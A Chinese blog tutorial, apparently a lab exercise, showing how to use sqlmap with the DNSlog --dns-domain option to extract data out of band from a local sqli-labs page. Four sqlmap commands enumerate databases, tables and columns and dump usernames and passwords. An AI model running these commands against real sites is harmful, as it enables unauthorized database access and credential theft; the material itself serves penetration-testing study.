当前位置: 首页 > news >正文

dnslog+sqlmap外带数据

目录

爆库

爆表

爆列

爆数据


sqlmap+DNSlog 外带参数 –dns-domain参数注入

–dns-domain参数为dnslog平台的域名(我们也可以使用本地)

爆库

python sqlmap.py -u "http://127.0.0.1/sqli/less-8/index.php/?id=1" -technique=B -dns-domain "域名" -dbs

爆表

python sqlmap.py -u "http://127.0.0.1/sqli/less-8/index.php/?id=1" -technique=B -dns-domain "域名" -D 库名 -tables

爆列

python sqlmap.py -u "http://127.0.0.1/sqli/less-8/index.php/?id=1" -technique=B -dns-domain "域名" -D security -T users –columns

爆数据

python sqlmap.py -u "http://127.0.0.1/sqli/less-8/index.php/?id=1" -technique=B -dns-domain "域名" -D security -T users -C username,password –dump

http://www.dtcms.com/a/15785.html

相关文章:

  • vue3 pinia状态管理
  • 动态规划----------完全背包问题
  • Android Studio:键值对存储sharedPreferences
  • Qt接入deepseekv3 API 提供openssl 1.1.1g安装包
  • 【matlab】大小键盘对应的Kbname
  • 新产品来袭~适用于新能源电力的霍尔传感器
  • 简述deepseek创始人的创业之路
  • 第三次作业
  • 【详细指南】如何在银河麒麟操作系统上使用DeepSeek?
  • flutter 打包mac应用并安装过程
  • 42.水果销售系统(springbootvue的Java项目[含微信小程序])
  • LabVIEW外腔二极管激光器稳频实验
  • 基于SpringBoot的电影院售票管理系统
  • nextjs的基础了解
  • 【C/C++算法】从浅到深学习--- 二分查找(图文兼备 + 源码详解)
  • 第十一篇:EMC的“电磁护盾”——三电系统干扰抑制实战
  • 【ISO 14229-1:2023 UDS诊断全量测试用例清单系列:第十四节】
  • 庞氏骗局(Ponzi Scheme):金融投资与公司经营中的隐形陷阱(中英双语)
  • 恒创科技:如何重新启动 Windows 服务器
  • Windows电脑笔记软件多 推荐几款好用的笔记工具
  • Android图片加载框架Coil,Kotlin
  • 企业的文档安全怎么防护?
  • 无耳科技 Solon v3.0.8 发布,Java 企业级应用开发框架
  • uniapp在地图上加载CAD图,标记区域网格,加载geojson数据
  • Git指南-从入门到精通
  • LabVIEW 用户界面设计基础原则
  • Node.js 连接 MongoDB
  • C# 封送和远程编程介绍
  • 如何动态修改第三方组件库的内部样式
  • Golang GORM系列:GORM事务及错误处理